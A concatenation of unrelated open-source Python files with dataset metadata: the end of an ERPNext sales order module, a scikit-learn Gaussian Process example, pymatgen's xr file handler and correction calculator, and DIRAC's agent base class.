and name in (select supplier from `tabSales Order Item` where parent = %(parent)s)
order by
if(locate(%(_txt)s, name), locate(%(_txt)s, name), 99999),
if(locate(%(_txt)s, supplier_name), locate(%(_txt)s, supplier_name), 99999),
name, supplier_name
limit %(start)s, %(page_len)s """.format(**{
'field': fields,
'key': frappe.db.escape(searchfield)
}), {
'txt': "%%%s%%" % txt,
'_txt': txt.replace("%", ""),
'start': start,
'page_len': page_len,
'parent': filters.get('parent')
})
@frappe.whitelist()
def make_production_orders(items, sales_order, company, project=None):
'''Make Production Orders against the given Sales Order for the given `items`'''
items = json.loads(items).get('items')
out = []
for i in items:
production_order = frappe.get_doc(dict(
doctype='Production Order',
production_item=i['item_code'],
bom_no=i['bom'],
qty=i['pending_qty'],
company=company,
sales_order=sales_order,
project=project,
fg_warehouse=i['warehouse']
)).insert()
production_order.set_production_order_operations()
production_order.save()
out.append(production_order)
return [p.name for p in out]
@frappe.whitelist()
def update_status(status, name):
so = frappe.get_doc("Sales Order", name)
so.update_status(status)
def get_default_bom_item(item_code):
bom = frappe.get_all('BOM', dict(item=item_code, is_active=True),
order_by='is_default desc')
bom = bom[0].name if bom else None
return bom
|
mbauskar/erpnext
|
erpnext/selling/doctype/sales_order/sales_order.py
|
Python
|
gpl-3.0
| 26,900
|
[
"VisIt"
] |
56e63d59c7e9580fe704c24056291a5ea9802d6594962784321403a7f25c871b
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
========================================================================
Gaussian Processes regression: goodness-of-fit on the 'diabetes' dataset
========================================================================
This example consists in fitting a Gaussian Process model onto the diabetes
dataset.
The correlation parameters are determined by means of maximum likelihood
estimation (MLE). An anisotropic squared exponential correlation model with a
constant regression model are assumed. We also used a nugget = 1e-2 in order to
account for the (strong) noise in the targets.
We compute then compute a cross-validation estimate of the coefficient of
determination (R2) without reperforming MLE, using the set of correlation
parameters found on the whole dataset.
"""
print(__doc__)
# Author: Vincent Dubourg <vincent.dubourg@gmail.com>
# Licence: BSD 3 clause
from sklearn import datasets
from sklearn.gaussian_process import GaussianProcess
from sklearn.cross_validation import cross_val_score, KFold
# Load the dataset from scikit's data sets
diabetes = datasets.load_diabetes()
X, y = diabetes.data, diabetes.target
# Instanciate a GP model
gp = GaussianProcess(regr='constant', corr='absolute_exponential',
theta0=[1e-4] * 10, thetaL=[1e-12] * 10,
thetaU=[1e-2] * 10, nugget=1e-2, optimizer='Welch')
# Fit the GP model to the data performing maximum likelihood estimation
gp.fit(X, y)
# Deactivate maximum likelihood estimation for the cross-validation loop
gp.theta0 = gp.theta_ # Given correlation parameter = MLE
gp.thetaL, gp.thetaU = None, None # None bounds deactivate MLE
# Perform a cross-validation estimate of the coefficient of determination using
# the cross_validation module using all CPUs available on the machine
K = 20 # folds
R2 = cross_val_score(gp, X, y=y, cv=KFold(y.size, K), n_jobs=1).mean()
print("The %d-Folds estimate of the coefficient of determination is R2 = %s"
% (K, R2))
|
RPGOne/Skynet
|
scikit-learn-c604ac39ad0e5b066d964df3e8f31ba7ebda1e0e/examples/gaussian_process/gp_diabetes_dataset.py
|
Python
|
bsd-3-clause
| 2,021
|
[
"Gaussian"
] |
56f467e5f041de3a4caf83fb15f45f6c5003d8a4d96effbab8d5df8eab043996
|
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
from __future__ import division, unicode_literals
"""
This module provides input and output mechanisms
for the xr file format, which is a modified CSSR
file format and, for example, used in GULP.
In particular, the module makes it easy
to remove shell positions from relaxations
that employed core-shell models.
"""
__author__ = "Nils Edvin Richard Zimmermann"
__copyright__ = "Copyright 2016, The Materials Project"
__version__ = "0.1"
__maintainer__ = "Nils Edvin Richard Zimmermann"
__email__ = "nils.e.r.zimmermann@gmail.com"
__date__ = "June 23, 2016"
import re
from six.moves import map
import numpy as np
from monty.io import zopen
from math import fabs
from pymatgen.core.lattice import Lattice
from pymatgen.core.structure import Structure
class Xr(object):
"""
Basic object for working with xr files.
Args:
structure (Structure/IStructure): Structure object to create the
Xr object.
"""
def __init__(self, structure):
if not structure.is_ordered:
raise ValueError("Xr file can only be constructed from ordered "
"structure")
self.structure = structure
def __str__(self):
output = ["pymatgen {:.4f} {:.4f} {:.4f}"
.format(*self.structure.lattice.abc),
"{:.3f} {:.3f} {:.3f}"
.format(*self.structure.lattice.angles),
"{} 0".format(len(self.structure)),
"0 {}".format(self.structure.formula)]
# There are actually 10 more fields per site
# in a typical xr file from GULP, for example.
for i, site in enumerate(self.structure.sites):
output.append("{} {} {:.4f} {:.4f} {:.4f}"
.format(i + 1, site.specie, site.x, site.y, site.z))
mat = self.structure.lattice.matrix
for i in range(2):
for j in range(3):
output.append("{:.4f} {:.4f} {:.4f}".format(
mat[j][0], mat[j][1], mat[j][2]))
return "\n".join(output)
def write_file(self, filename):
"""
Write out an xr file.
Args:
filename (str): name of the file to write to.
"""
with zopen(filename, 'wt') as f:
f.write(str(self) + "\n")
@staticmethod
def from_string(string, use_cores=True, thresh=1.e-4):
"""
Creates an Xr object from a string representation.
Args:
string (str): string representation of an Xr object.
use_cores (bool): use core positions and discard shell
positions if set to True (default). Otherwise,
use shell positions and discard core positions.
thresh (float): relative threshold for consistency check
between cell parameters (lengths and angles) from
header information and cell vectors, respectively.
Returns:
xr (Xr): Xr object corresponding to the input
string representation.
"""
lines = string.split("\n")
toks = lines[0].split()
lengths = [float(toks[i]) for i in range(1, len(toks))]
toks = lines[1].split()
angles = [float(i) for i in toks[0:3]]
toks = lines[2].split()
nsites = int(toks[0])
mat = np.zeros((3,3), dtype=float)
for i in range(3):
toks = lines[4+nsites+i].split()
toks2 = lines[4+nsites+i+3].split()
for j, item in enumerate(toks):
if item != toks2[j]:
raise RuntimeError("expected both matrices"
" to be the same in xr file")
mat[i] = np.array([float(w) for w in toks])
lat = Lattice(mat)
if fabs(lat.a-lengths[0])/fabs(lat.a) > thresh or \
fabs(lat.b-lengths[1])/fabs(lat.b) > thresh or \
fabs(lat.c-lengths[2])/fabs(lat.c) > thresh or \
fabs(lat.alpha-angles[0])/fabs(lat.alpha) > thresh or \
fabs(lat.beta-angles[1])/fabs(lat.beta) > thresh or \
fabs(lat.gamma-angles[2])/fabs(lat.gamma) > thresh:
raise RuntimeError("cell parameters in header ("+str(lengths)+\
", "+str(angles)+") are not consistent with Cartesian"+\
" lattice vectors ("+str(lat.abc)+", "+\
str(lat.angles)+")")
# Ignore line w/ index 3.
sp = []
coords = []
for j in range(nsites):
m = re.match("\d+\s+(\w+)\s+([0-9\-\.]+)\s+([0-9\-\.]+)\s+" +
"([0-9\-\.]+)", lines[4+j].strip())
if m:
tmp_sp = m.group(1)
if use_cores and tmp_sp[len(tmp_sp)-2:] == "_s":
continue
if not use_cores and tmp_sp[len(tmp_sp)-2:] == "_c":
continue
if tmp_sp[len(tmp_sp)-2] == "_":
sp.append(tmp_sp[0:len(tmp_sp)-2])
else:
sp.append(tmp_sp)
coords.append([float(m.group(i)) for i in range(2, 5)])
return Xr(Structure(lat, sp, coords, coords_are_cartesian=True))
@staticmethod
def from_file(filename, use_cores=True, thresh=1.e-4):
"""
Reads an xr-formatted file to create an Xr object.
Args:
filename (str): name of file to read from.
use_cores (bool): use core positions and discard shell
positions if set to True (default). Otherwise,
use shell positions and discard core positions.
thresh (float): relative threshold for consistency check
between cell parameters (lengths and angles) from
header information and cell vectors, respectively.
Returns:
xr (Xr): Xr object corresponding to the input
file.
"""
with zopen(filename, "rt") as f:
return Xr.from_string(
f.read(), use_cores=use_cores,
thresh=thresh)
|
aykol/pymatgen
|
pymatgen/io/xr.py
|
Python
|
mit
| 6,270
|
[
"GULP",
"pymatgen"
] |
ac0668f4564a53654f9002a2f126b92827d0a50031749a811eb271a6e85b05f1
|
########################################################################
# $HeadURL$
# File : AgentModule.py
# Author : Adria Casajus
########################################################################
"""
Base class for all agent modules
"""
__RCSID__ = "$Id$"
import os
import threading
import types
import time
import DIRAC
from DIRAC import S_OK, S_ERROR, gConfig, gLogger, gMonitor, rootPath
from DIRAC.ConfigurationSystem.Client import PathFinder
from DIRAC.FrameworkSystem.Client.MonitoringClient import MonitoringClient
from DIRAC.Core.Utilities.Shifter import setupShifterProxyInEnv
from DIRAC.Core.Utilities.ReturnValues import isReturnStructure
from DIRAC.Core.Utilities import Time, MemStat
def _checkDir( path ):
try:
os.makedirs( path )
except Exception:
pass
if not os.path.isdir( path ):
raise Exception( 'Can not create %s' % path )
class AgentModule:
""" Base class for all agent modules
This class is used by the AgentReactor Class to steer the execution of
DIRAC Agents.
For this purpose the following methods are used:
- am_initialize() just after instantiated
- am_getPollingTime() to set the execution frequency
- am_getMaxCycles() to determine the number of cycles
- am_go() for the actual execution of one cycle
Before each iteration, the following methods are used to determine
if the new cycle is to be started.
- am_getModuleParam( 'alive' )
- am_checkStopAgentFile()
- am_removeStopAgentFile()
To start new execution cycle the following methods are used
- am_getCyclesDone()
- am_setOption( 'MaxCycles', maxCycles )
At the same time it provides all Agents with common interface.
All Agent class must inherit from this base class and must implement
at least the following method:
- execute() main method called in the agent cycle
Additionally they may provide:
- initialize() for initial settings
- finalize() the graceful exit
- beginExecution() before each execution cycle
- endExecution() at the end of each execution cycle
The agent can be stopped either by a signal or by creating a 'stop_agent' file
in the controlDirectory defined in the agent configuration
"""
def __init__( self, agentName, loadName, baseAgentName = False, properties = {} ):
"""
Common __init__ method for all Agents.
All Agent modules must define:
__doc__
__RCSID__
They are used to populate __codeProperties
The following Options are used from the Configuration:
- /LocalSite/InstancePath
- /DIRAC/Setup
- Status
- Enabled
- PollingTime default = 120
- MaxCycles default = 500
- ControlDirectory control/SystemName/AgentName
- WorkDirectory work/SystemName/AgentName
- shifterProxy ''
- shifterProxyLocation WorkDirectory/SystemName/AgentName/.shifterCred
It defines the following default Options that can be set via Configuration (above):
- MonitoringEnabled True
- Enabled True if Status == Active
- PollingTime 120
- MaxCycles 500
- ControlDirectory control/SystemName/AgentName
- WorkDirectory work/SystemName/AgentName
- shifterProxy False
- shifterProxyLocation work/SystemName/AgentName/.shifterCred
different defaults can be set in the initialize() method of the Agent using am_setOption()
In order to get a shifter proxy in the environment during the execute()
the configuration Option 'shifterProxy' must be set, a default may be given
in the initialize() method.
"""
if baseAgentName and agentName == baseAgentName:
self.log = gLogger
standaloneModule = True
else:
self.log = gLogger.getSubLogger( agentName, child = False )
standaloneModule = False
self.__basePath = gConfig.getValue( '/LocalSite/InstancePath', rootPath )
self.__agentModule = None
self.__codeProperties = {}
self.__getCodeInfo()
self.__moduleProperties = { 'fullName' : agentName,
'loadName' : loadName,
'section' : PathFinder.getAgentSection( agentName ),
'loadSection' : PathFinder.getAgentSection( loadName ),
'standalone' : standaloneModule,
'cyclesDone' : 0,
'totalElapsedTime' : 0,
'setup' : gConfig.getValue( "/DIRAC/Setup", "Unknown" ),
'alive' : True }
self.__moduleProperties[ 'system' ], self.__moduleProperties[ 'agentName' ] = agentName.split( "/" )
self.__configDefaults = {}
self.__configDefaults[ 'MonitoringEnabled'] = True
self.__configDefaults[ 'Enabled'] = self.am_getOption( "Status", "Active" ).lower() in ( 'active' )
self.__configDefaults[ 'PollingTime'] = self.am_getOption( "PollingTime", 120 )
self.__configDefaults[ 'MaxCycles'] = self.am_getOption( "MaxCycles", 500 )
self.__configDefaults[ 'ControlDirectory' ] = os.path.join( self.__basePath,
'control',
*agentName.split( "/" ) )
self.__configDefaults[ 'WorkDirectory' ] = os.path.join( self.__basePath,
'work',
*agentName.split( "/" ) )
self.__configDefaults[ 'shifterProxy' ] = ''
self.__configDefaults[ 'shifterProxyLocation' ] = os.path.join( self.__configDefaults[ 'WorkDirectory' ],
'.shifterCred' )
if type( properties ) == types.DictType:
for key in properties:
self.__moduleProperties[ key ] = properties[ key ]
self.__moduleProperties[ 'executors' ] = [ ( self.execute, () ) ]
self.__moduleProperties[ 'shifterProxy' ] = False
self.__monitorLastStatsUpdate = -1
self.monitor = None
self.__initializeMonitor()
self.__initialized = False
def __getCodeInfo( self ):
versionVar = "__RCSID__"
docVar = "__doc__"
try:
self.__agentModule = __import__( self.__class__.__module__,
globals(),
locals(),
versionVar )
except Exception:
self.log.exception( "Cannot load agent module" )
for prop in ( ( versionVar, "version" ), ( docVar, "description" ) ):
try:
self.__codeProperties[ prop[1] ] = getattr( self.__agentModule, prop[0] )
except Exception:
self.log.error( "Missing %s" % prop[0] )
self.__codeProperties[ prop[1] ] = 'unset'
self.__codeProperties[ 'DIRACVersion' ] = DIRAC.version
self.__codeProperties[ 'platform' ] = DIRAC.platform
def am_initialize( self, *initArgs ):
agentName = self.am_getModuleParam( 'fullName' )
result = self.initialize( *initArgs )
if not isReturnStructure( result ):
return S_ERROR( "initialize must return S_OK/S_ERROR" )
if not result[ 'OK' ]:
return S_ERROR( "Error while initializing %s: %s" % ( agentName, result[ 'Message' ] ) )
_checkDir( self.am_getControlDirectory() )
workDirectory = self.am_getWorkDirectory()
_checkDir( workDirectory )
# Set the work directory in an environment variable available to subprocesses if needed
os.environ['AGENT_WORKDIRECTORY'] = workDirectory
self.__moduleProperties[ 'shifterProxy' ] = self.am_getOption( 'shifterProxy' )
if self.am_monitoringEnabled():
self.monitor.enable()
if len( self.__moduleProperties[ 'executors' ] ) < 1:
return S_ERROR( "At least one executor method has to be defined" )
if not self.am_Enabled():
return S_ERROR( "Agent is disabled via the configuration" )
self.log.notice( "="*40 )
self.log.notice( "Loaded agent module %s" % self.__moduleProperties[ 'fullName' ] )
self.log.notice( " Site: %s" % DIRAC.siteName() )
self.log.notice( " Setup: %s" % gConfig.getValue( "/DIRAC/Setup" ) )
self.log.notice( " Base Module version: %s " % __RCSID__ )
self.log.notice( " Agent version: %s" % self.__codeProperties[ 'version' ] )
self.log.notice( " DIRAC version: %s" % DIRAC.version )
self.log.notice( " DIRAC platform: %s" % DIRAC.platform )
pollingTime = int( self.am_getOption( 'PollingTime' ) )
if pollingTime > 3600:
self.log.notice( " Polling time: %s hours" % ( pollingTime / 3600. ) )
else:
self.log.notice( " Polling time: %s seconds" % self.am_getOption( 'PollingTime' ) )
self.log.notice( " Control dir: %s" % self.am_getControlDirectory() )
self.log.notice( " Work dir: %s" % self.am_getWorkDirectory() )
if self.am_getOption( 'MaxCycles' ) > 0:
self.log.notice( " Cycles: %s" % self.am_getMaxCycles() )
else:
self.log.notice( " Cycles: unlimited" )
self.log.notice( "="*40 )
self.__initialized = True
return S_OK()
def am_getControlDirectory( self ):
return os.path.join( self.__basePath, str( self.am_getOption( 'ControlDirectory' ) ) )
def am_getStopAgentFile( self ):
return os.path.join( self.am_getControlDirectory(), 'stop_agent' )
def am_checkStopAgentFile( self ):
return os.path.isfile( self.am_getStopAgentFile() )
def am_createStopAgentFile( self ):
try:
fd = open( self.am_getStopAgentFile(), 'w' )
fd.write( 'Dirac site agent Stopped at %s' % Time.toString() )
fd.close()
except Exception:
pass
def am_removeStopAgentFile( self ):
try:
os.unlink( self.am_getStopAgentFile() )
except Exception:
pass
def am_getBasePath( self ):
return self.__basePath
def am_getWorkDirectory( self ):
return os.path.join( self.__basePath, str( self.am_getOption( 'WorkDirectory' ) ) )
def am_getShifterProxyLocation( self ):
return os.path.join( self.__basePath, str( self.am_getOption( 'shifterProxyLocation' ) ) )
def am_getOption( self, optionName, defaultValue = None ):
if defaultValue == None:
if optionName in self.__configDefaults:
defaultValue = self.__configDefaults[ optionName ]
if optionName and optionName[0] == "/":
return gConfig.getValue( optionName, defaultValue )
for section in ( self.__moduleProperties[ 'section' ], self.__moduleProperties[ 'loadSection' ] ):
result = gConfig.getOption( "%s/%s" % ( section, optionName ), defaultValue )
if result[ 'OK' ]:
return result[ 'Value' ]
return defaultValue
def am_setOption( self, optionName, value ):
self.__configDefaults[ optionName ] = value
def am_getModuleParam( self, optionName ):
return self.__moduleProperties[ optionName ]
def am_setModuleParam( self, optionName, value ):
self.__moduleProperties[ optionName ] = value
def am_getPollingTime( self ):
return self.am_getOption( "PollingTime" )
def am_getMaxCycles( self ):
return self.am_getOption( "MaxCycles" )
def am_getCyclesDone( self ):
return self.am_getModuleParam( 'cyclesDone' )
def am_Enabled( self ):
return self.am_getOption( "Enabled" )
def am_disableMonitoring( self ):
self.am_setOption( 'MonitoringEnabled' , False )
def am_monitoringEnabled( self ):
return self.am_getOption( "MonitoringEnabled" )
def am_stopExecution( self ):
self.am_setModuleParam( 'alive', False )
def __initializeMonitor( self ):
"""
Initialize the system monitor client
"""
if self.__moduleProperties[ 'standalone' ]:
self.monitor = gMonitor
else:
self.monitor = MonitoringClient()
self.monitor.setComponentType( self.monitor.COMPONENT_AGENT )
self.monitor.setComponentName( self.__moduleProperties[ 'fullName' ] )
self.monitor.initialize()
self.monitor.registerActivity( 'CPU', "CPU Usage", 'Framework', "CPU,%", self.monitor.OP_MEAN, 600 )
self.monitor.registerActivity( 'MEM', "Memory Usage", 'Framework', 'Memory,MB', self.monitor.OP_MEAN, 600 )
# Component monitor
for field in ( 'version', 'DIRACVersion', 'description', 'platform' ):
self.monitor.setComponentExtraParam( field, self.__codeProperties[ field ] )
self.monitor.setComponentExtraParam( 'startTime', Time.dateTime() )
self.monitor.setComponentExtraParam( 'cycles', 0 )
self.monitor.disable()
self.__monitorLastStatsUpdate = time.time()
def am_secureCall( self, functor, args = (), name = False ):
if not name:
name = str( functor )
try:
result = functor( *args )
if not isReturnStructure( result ):
raise Exception( "%s method for %s module has to return S_OK/S_ERROR" % ( name, self.__moduleProperties[ 'fullName' ] ) )
return result
except Exception, e:
self.log.exception( "Exception while calling %s method" % name )
return S_ERROR( "Exception while calling %s method: %s" % ( name, str( e ) ) )
def _setShifterProxy( self ):
if self.__moduleProperties[ "shifterProxy" ]:
result = setupShifterProxyInEnv( self.__moduleProperties[ "shifterProxy" ],
self.am_getShifterProxyLocation() )
if not result[ 'OK' ]:
self.log.error( result['Message'] )
return result
return S_OK()
def am_go( self ):
# Set the shifter proxy if required
result = self._setShifterProxy()
if not result[ 'OK' ]:
return result
self.log.notice( "-"*40 )
self.log.notice( "Starting cycle for module %s" % self.__moduleProperties[ 'fullName' ] )
mD = self.am_getMaxCycles()
if mD > 0:
cD = self.__moduleProperties[ 'cyclesDone' ]
self.log.notice( "Remaining %s of %s cycles" % ( mD - cD, mD ) )
self.log.notice( "-"*40 )
elapsedTime = time.time()
cpuStats = self._startReportToMonitoring()
cycleResult = self.__executeModuleCycle()
if cpuStats:
self._endReportToMonitoring( *cpuStats )
# Increment counters
self.__moduleProperties[ 'cyclesDone' ] += 1
# Show status
elapsedTime = time.time() - elapsedTime
self.__moduleProperties[ 'totalElapsedTime' ] += elapsedTime
self.log.notice( "-"*40 )
self.log.notice( "Agent module %s run summary" % self.__moduleProperties[ 'fullName' ] )
self.log.notice( " Executed %s times previously" % self.__moduleProperties[ 'cyclesDone' ] )
self.log.notice( " Cycle took %.2f seconds" % elapsedTime )
averageElapsedTime = self.__moduleProperties[ 'totalElapsedTime' ] / self.__moduleProperties[ 'cyclesDone' ]
self.log.notice( " Average execution time: %.2f seconds" % ( averageElapsedTime ) )
elapsedPollingRate = averageElapsedTime * 100 / self.am_getOption( 'PollingTime' )
self.log.notice( " Polling time: %s seconds" % self.am_getOption( 'PollingTime' ) )
self.log.notice( " Average execution/polling time: %.2f%%" % elapsedPollingRate )
if cycleResult[ 'OK' ]:
self.log.notice( " Cycle was successful" )
else:
self.log.warn( " Cycle had an error:", cycleResult[ 'Message' ] )
self.log.notice( "-"*40 )
# Update number of cycles
self.monitor.setComponentExtraParam( 'cycles', self.__moduleProperties[ 'cyclesDone' ] )
return cycleResult
def _startReportToMonitoring( self ):
try:
now = time.time()
stats = os.times()
cpuTime = stats[0] + stats[2]
if now - self.__monitorLastStatsUpdate < 10:
return ( now, cpuTime )
# Send CPU consumption mark
self.__monitorLastStatsUpdate = now
# Send Memory consumption mark
membytes = MemStat.VmB( 'VmRSS:' )
if membytes:
mem = membytes / ( 1024. * 1024. )
gMonitor.addMark( 'MEM', mem )
return( now, cpuTime )
except Exception:
return False
def _endReportToMonitoring( self, initialWallTime, initialCPUTime ):
wallTime = time.time() - initialWallTime
stats = os.times()
cpuTime = stats[0] + stats[2] - initialCPUTime
percentage = cpuTime / wallTime * 100.
if percentage > 0:
gMonitor.addMark( 'CPU', percentage )
def __executeModuleCycle( self ):
# Execute the beginExecution function
result = self.am_secureCall( self.beginExecution, name = "beginExecution" )
if not result[ 'OK' ]:
return result
# Launch executor functions
executors = self.__moduleProperties[ 'executors' ]
if len( executors ) == 1:
result = self.am_secureCall( executors[0][0], executors[0][1] )
if not result[ 'OK' ]:
return result
else:
exeThreads = [ threading.Thread( target = executor[0], args = executor[1] ) for executor in executors ]
for thread in exeThreads:
thread.setDaemon( 1 )
thread.start()
for thread in exeThreads:
thread.join()
# Execute the endExecution function
return self.am_secureCall( self.endExecution, name = "endExecution" )
def initialize( self, *args, **kwargs ):
return S_OK()
def beginExecution( self ):
return S_OK()
def endExecution( self ):
return S_OK()
def finalize( self ):
return S_OK()
def execute( self ):
return S_ERROR( "Execute method has to be overwritten by agent module" )
|
sposs/DIRAC
|
Core/Base/AgentModule.py
|
Python
|
gpl-3.0
| 17,556
|
[
"DIRAC"
] |
94c9eb5dab19a1644234154c4bc4e800cb9ff21620b3fd32cda234bb7dd9d82d
|
"""
This module calculates corrections for the species listed below, fitted to the experimental and computed
entries given to the CorrectionCalculator constructor.
"""
import os
import warnings
from collections import OrderedDict
from typing import Dict, List, Tuple, Union, Optional
import numpy as np
import plotly.graph_objects as go
from monty.serialization import loadfn
from scipy.optimize import curve_fit
from pymatgen.core import yaml
from pymatgen.core.composition import Composition
from pymatgen.core.periodic_table import Element
from pymatgen.analysis.reaction_calculator import ComputedReaction
from pymatgen.analysis.structure_analyzer import sulfide_type
def _func(x, *m):
"""
Helper function for curve_fit.
"""
return np.dot(x, m)
class CorrectionCalculator:
"""
A CorrectionCalculator contains experimental and computed entries which it uses to compute corrections.
It graphs residual errors after applying the computed corrections and creates the MPCompatibility.yaml
file the Correction classes use.
Attributes:
species: list of species that corrections are being calculated for
exp_compounds: list of dictionaries which each contain a compound's formula and experimental data
calc_compounds: dictionary of ComputedEntry objects
corrections: list of corrections in same order as species list
corrections_std_error: list of the variances of the corrections in same order as species list
corrections_dict: dictionary of format {'species': (value, uncertainty)} for easier correction lookup
"""
def __init__(
self,
species: List[str] = [
"oxide",
"peroxide",
"superoxide",
"S",
"F",
"Cl",
"Br",
"I",
"N",
"Se",
"Si",
"Sb",
"Te",
"V",
"Cr",
"Mn",
"Fe",
"Co",
"Ni",
"W",
"Mo",
"H",
],
max_error: float = 0.1,
allow_unstable: Union[float, bool] = 0.1,
exclude_polyanions: List[str] = [
"SO4",
"SO3",
"CO3",
"NO3",
"NO2",
"OCl3",
"ClO3",
"ClO4",
"HO",
"ClO",
"SeO3",
"TiO3",
"TiO4",
"WO4",
"SiO3",
"SiO4",
"Si2O5",
"PO3",
"PO4",
"P2O7",
],
) -> None:
"""
Initializes a CorrectionCalculator.
Args:
species: list of species to calculate corrections for
max_error: maximum tolerable relative uncertainty in experimental energy.
Compounds with relative uncertainty greater than this value will be excluded from the fit
allow_unstable: whether unstable entries are to be included in the fit. If True, all compounds will
be included regardless of their energy above hull. If False or a float, compounds with
energy above hull greater than the given value (defaults to 0.1 eV/atom) will be
excluded
exclude_polyanions: a list of polyanions that contain additional sources of error that may negatively
influence the quality of the fitted corrections. Compounds with these polyanions
will be excluded from the fit
"""
self.species = species
self.max_error = max_error
if not allow_unstable:
self.allow_unstable = 0.1
else:
self.allow_unstable = allow_unstable
self.exclude_polyanions = exclude_polyanions
self.corrections: List[float] = []
self.corrections_std_error: List[float] = []
self.corrections_dict: Dict[str, Tuple[float, float]] = {} # {'species': (value, uncertainty)}
# to help the graph_residual_error_per_species() method differentiate between oxygen containing compounds
if "oxide" in self.species:
self.oxides: List[str] = []
if "peroxide" in self.species:
self.peroxides: List[str] = []
if "superoxide" in self.species:
self.superoxides: List[str] = []
if "S" in self.species:
self.sulfides: List[str] = []
def compute_from_files(self, exp_gz: str, comp_gz: str):
"""
Args:
exp_gz: name of .json.gz file that contains experimental data
data in .json.gz file should be a list of dictionary objects with the following keys/values:
{"formula": chemical formula, "exp energy": formation energy in eV/formula unit,
"uncertainty": uncertainty in formation energy}
comp_gz: name of .json.gz file that contains computed entries
data in .json.gz file should be a dictionary of {chemical formula: ComputedEntry}
"""
exp_entries = loadfn(exp_gz)
calc_entries = loadfn(comp_gz)
return self.compute_corrections(exp_entries, calc_entries)
def compute_corrections(self, exp_entries: list, calc_entries: dict) -> dict:
"""
Computes the corrections and fills in correction, corrections_std_error, and corrections_dict.
Args:
exp_entries: list of dictionary objects with the following keys/values:
{"formula": chemical formula, "exp energy": formation energy in eV/formula unit,
"uncertainty": uncertainty in formation energy}
calc_entries: dictionary of computed entries, of the form {chemical formula: ComputedEntry}
Raises:
ValueError: calc_compounds is missing an entry
"""
self.exp_compounds = exp_entries
self.calc_compounds = calc_entries
self.names: List[str] = []
self.diffs: List[float] = []
self.coeff_mat: List[List[float]] = []
self.exp_uncer: List[float] = []
# remove any corrections in calc_compounds
for entry in self.calc_compounds.values():
entry.correction = 0
for cmpd_info in self.exp_compounds:
# to get consistent element ordering in formula
name = Composition(cmpd_info["formula"]).reduced_formula
allow = True
compound = self.calc_compounds.get(name, None)
if not compound:
warnings.warn(
"Compound {} is not found in provided computed entries and is excluded from the fit".format(name)
)
continue
# filter out compounds with large uncertainties
relative_uncertainty = abs(cmpd_info["uncertainty"] / cmpd_info["exp energy"])
if relative_uncertainty > self.max_error:
allow = False
warnings.warn(
"Compound {} is excluded from the fit due to high experimental uncertainty ({}%)".format(
name, relative_uncertainty
)
)
# filter out compounds containing certain polyanions
for anion in self.exclude_polyanions:
if anion in name or anion in cmpd_info["formula"]:
allow = False
warnings.warn(
"Compound {} contains the polyanion {} and is excluded from the fit".format(name, anion)
)
break
# filter out compounds that are unstable
if isinstance(self.allow_unstable, float):
try:
eah = compound.data["e_above_hull"]
except KeyError:
raise ValueError("Missing e above hull data")
if eah > self.allow_unstable:
allow = False
warnings.warn(
"Compound {} is unstable and excluded from the fit (e_above_hull = {})".format(name, eah)
)
if allow:
comp = Composition(name)
elems = list(comp.as_dict())
reactants = []
for elem in elems:
try:
elem_name = Composition(elem).reduced_formula
reactants.append(self.calc_compounds[elem_name])
except KeyError:
raise ValueError("Computed entries missing " + elem)
rxn = ComputedReaction(reactants, [compound])
rxn.normalize_to(comp)
energy = rxn.calculated_reaction_energy
coeff = []
for specie in self.species:
if specie == "oxide":
if compound.data["oxide_type"] == "oxide":
coeff.append(comp["O"])
self.oxides.append(name)
else:
coeff.append(0)
elif specie == "peroxide":
if compound.data["oxide_type"] == "peroxide":
coeff.append(comp["O"])
self.peroxides.append(name)
else:
coeff.append(0)
elif specie == "superoxide":
if compound.data["oxide_type"] == "superoxide":
coeff.append(comp["O"])
self.superoxides.append(name)
else:
coeff.append(0)
elif specie == "S":
if Element("S") in comp:
sf_type = "sulfide"
if compound.data.get("sulfide_type"):
sf_type = compound.data["sulfide_type"]
elif hasattr(compound, "structure"):
sf_type = sulfide_type(compound.structure)
if sf_type == "sulfide":
coeff.append(comp["S"])
self.sulfides.append(name)
else:
coeff.append(0)
else:
coeff.append(0)
else:
try:
coeff.append(comp[specie])
except ValueError:
raise ValueError("We can't detect this specie: {}".format(specie))
self.names.append(name)
self.diffs.append((cmpd_info["exp energy"] - energy) / comp.num_atoms)
self.coeff_mat.append([i / comp.num_atoms for i in coeff])
self.exp_uncer.append((cmpd_info["uncertainty"]) / comp.num_atoms)
# for any exp entries with no uncertainty value, assign average uncertainty value
sigma = np.array(self.exp_uncer)
sigma[sigma == 0] = np.nan
with warnings.catch_warnings():
warnings.simplefilter(
"ignore", category=RuntimeWarning
) # numpy raises warning if the entire array is nan values
mean_uncer = np.nanmean(sigma)
sigma = np.where(np.isnan(sigma), mean_uncer, sigma)
if np.isnan(mean_uncer):
# no uncertainty values for any compounds, don't try to weight
popt, self.pcov = curve_fit(_func, self.coeff_mat, self.diffs, p0=np.ones(len(self.species)))
else:
popt, self.pcov = curve_fit(
_func,
self.coeff_mat,
self.diffs,
p0=np.ones(len(self.species)),
sigma=sigma,
absolute_sigma=True,
)
self.corrections = popt.tolist()
self.corrections_std_error = np.sqrt(np.diag(self.pcov)).tolist()
for i, v in enumerate(self.species):
self.corrections_dict[v] = (
round(self.corrections[i], 3),
round(self.corrections_std_error[i], 4),
)
# set ozonide correction to 0 so that this species does not recieve a correction
# while other oxide types do
self.corrections_dict["ozonide"] = (0, 0)
return self.corrections_dict
def graph_residual_error(self) -> go.Figure:
"""
Graphs the residual errors for all compounds after applying computed corrections.
"""
if len(self.corrections) == 0:
raise RuntimeError("Please call compute_corrections or compute_from_files to calculate corrections first")
abs_errors = [abs(i) for i in self.diffs - np.dot(self.coeff_mat, self.corrections)]
labels_graph = self.names.copy()
abs_errors, labels_graph = (list(t) for t in zip(*sorted(zip(abs_errors, labels_graph)))) # sort by error
num = len(abs_errors)
fig = go.Figure(
data=go.Scatter(
x=np.linspace(1, num, num),
y=abs_errors,
mode="markers",
text=labels_graph,
),
layout=go.Layout(
title=go.layout.Title(text="Residual Errors"),
yaxis=go.layout.YAxis(title=go.layout.yaxis.Title(text="Residual Error (eV/atom)")),
),
)
print("Residual Error:")
print("Median = " + str(np.median(np.array(abs_errors))))
print("Mean = " + str(np.mean(np.array(abs_errors))))
print("Std Dev = " + str(np.std(np.array(abs_errors))))
print("Original Error:")
print("Median = " + str(abs(np.median(np.array(self.diffs)))))
print("Mean = " + str(abs(np.mean(np.array(self.diffs)))))
print("Std Dev = " + str(np.std(np.array(self.diffs))))
return fig
